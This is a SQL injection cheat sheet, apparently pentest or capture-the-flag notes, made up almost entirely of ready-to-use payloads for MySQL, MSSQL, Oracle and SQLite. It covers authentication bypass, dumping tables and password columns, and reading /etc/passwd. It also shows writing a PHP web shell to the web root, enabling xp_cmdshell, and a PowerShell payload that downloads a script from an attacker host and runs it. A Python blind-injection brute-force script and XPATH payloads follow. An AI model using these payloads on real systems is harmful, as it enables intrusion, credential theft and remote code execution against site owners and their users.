SQL Injection

Common Injections

MySQL & MariaDB

Get Number of Columns

-1 order by 3;#

Get Version

-1 union select 1,2,version();#

Get Database Name

-1 union select 1,2,database();#

Get Table Name

-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<DATABASE>";#

Get Column Name

-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<DATABASE>" and table_name="<TABLE>";#

Read a File

SELECT LOAD_FILE('/etc/passwd')

Dump Data

-1 union select 1,2, group_concat(<COLUMN>) from <DATABASE>.<TABLE>;#

Create Webshell

LOAD_FILE('/etc/httpd/conf/httpd.conf')
select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/<FILE>.php";

or

LOAD_FILE('/etc/httpd/conf/httpd.conf')
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/<FILE>.php" -- //

MSSQL

Authentication Bypass

' or 1=1--

Get Version with Time-Based Injection

' SELECT @@version; WAITFOR DELAY '00:00:10'; —

Enable xp_cmdshell

' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Remote Code Execution (RCE)

' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" ;--

Orcale SQL

Authentication Bypass

' or 1=1--

Get Number of Columns

' order by 3--

Get Table Name

' union select null,table_name,null from all_tables--

Get Column Name

' union select null,column_name,null from all_tab_columns where table_name='<TABLE>'--

Dump Data

' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--

SQLite

Extracting Table Names

http://<RHOST>/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--

Extracting User Table

http://<RHOST>/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--

Error-based SQL Injection (SQLi)

<USERNAME>' OR 1=1 -- //

Results in:

SELECT * FROM users WHERE user_name= '<USERNAME>' OR 1=1 --

' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION-based SQL Injection (SQLi)

1

Find the number of columns

' union select 1,2-- -
' union select NULL,NULL-- -
' order by 5-- -

2

List the databses

' union select schema_name,NULL from information_schema.schemata-- -
' union select group_concat(schema_name,NULL) from information_schema.schemata-- -
' union select schema_name,NULL from information_schema.schemata limit 0,1-- -

// SQLite
' or 1=1 UNION SELECT tbl_name ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT sql ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT flag,NULL,value,NULL,NULL FROM secret_flag--

3

List the tables

' union select table_name,NULL from information_schema.tables where table_schema='<name>'--
' union select table_name,NULL from information_schema.tables where table_schema='<name>' limit 0,1--

4

List the columns

' union select column_name,NULL from information_schema.columns where table_name='<name>--
' union select column_name,NULL from information_schema.columns where table_name='<name> limit 0,1--

5

List the content

' union select concat(username,":",password) from users-- -
' union select concat(username,0x3a,password) from users-- -
' union select concat(username||':'||password) from users-- 

6

Read Files

' or 1=1 UNION SELECT load_file("/etc/passwd"),NULL,NULL,NULL,NULL--

if the file does not work try in hex:

echo "/etc/passwd" | tr -d '\n' \ xxd -ps

' or 1=1 UNION SELECT load_file("hex_file"),NULL,NULL,NULL,NULL--

7

Upload Files

' or 1=1 UNION SELECT "test",NULL,NULL,NULL,NULL into outfile "/var/www/html/test.txt"--
' or 1=1 UNION SELECT "<?php system($_GET['cmd']);?>",NULL,NULL,NULL,NULL into outfile "/var/www/html/webshell.php"--

Bind SQL

Let's assume that Bind SQL Injection was found. Let's do a script using substring for extracting the database name:

#!/usr/bin/env python3

import requests
import signal
import time
import pdb
import sys
import string

from pwn import *
from termcolor import colored

def def_handler(sig, frame):
	print(colored(f"\n\n[!] Exit...\n", 'red'))
	sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

cookies = {
	'<cookie1>': '<value1>', 
	'<cookie2>': '<value2>'
}

characters = string.ascii_lowercase + '-_,'
main_url = "<url>"

def makeSQL():

	p1 = log.progress("Brute Force")
	p1.status("Starting...")
	
	time.sleep(2)
	
	database = ""
	
	p2 = log.progress("Database")
	
	for pos in range(1,50):
		for character in characters:
			post_data = {
				'<parameter1>': '<value1>',
				"<parameter2>": f"'or substring(database(),{pos},1)='{character}'-- -"
			}
			
			p1.status(f"Trying with {character}")
			
			r = requests.post(main_url, data=post_data, cookies=cookies)
			
			if "<test displayed when sql is true>" in r.text:
				database += character
				p2.status(database)
				break
		


if __name__ == '__main__':

	makeSQL()

Then for extracting the table name we only modify the sql injection payload:

'or substring((select group_concat(table_name) from information_schema.tables where table_schema='<database_name>'),{pos},1)='{character}'-- -

Let's retrieve the columns of a table:

'or substring((select group_concat(column_name) from information_schema.columns where table_name='<table>'),{pos},1)='{character}'-- -

Retrieve user and password:

'or substring((select group_concat((BINARY username),':',(BINARY password)) from admin_users),{pos},1)='{character}'-- -

http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- //

http://<RHOST>/index.php?user=<USERNAME>' AND IF (1=1, sleep(3),'false') -- //

XPATH Injection

XPATH Error Based Injection Extractvaluesecurityidiots.com

We have to use XPATH when we try to inject and we get an error "Unknown column". So this is the condition when you can depend on XPATH injection.

This is the double quote over there..that means this time we are injecting into a string type query where the query is like.

select path from pages where view="<our_input_here>" limit 1,1;

Explotation

'and extractvalue(0x0a,concat(0x0a,(OUR_QUERY)))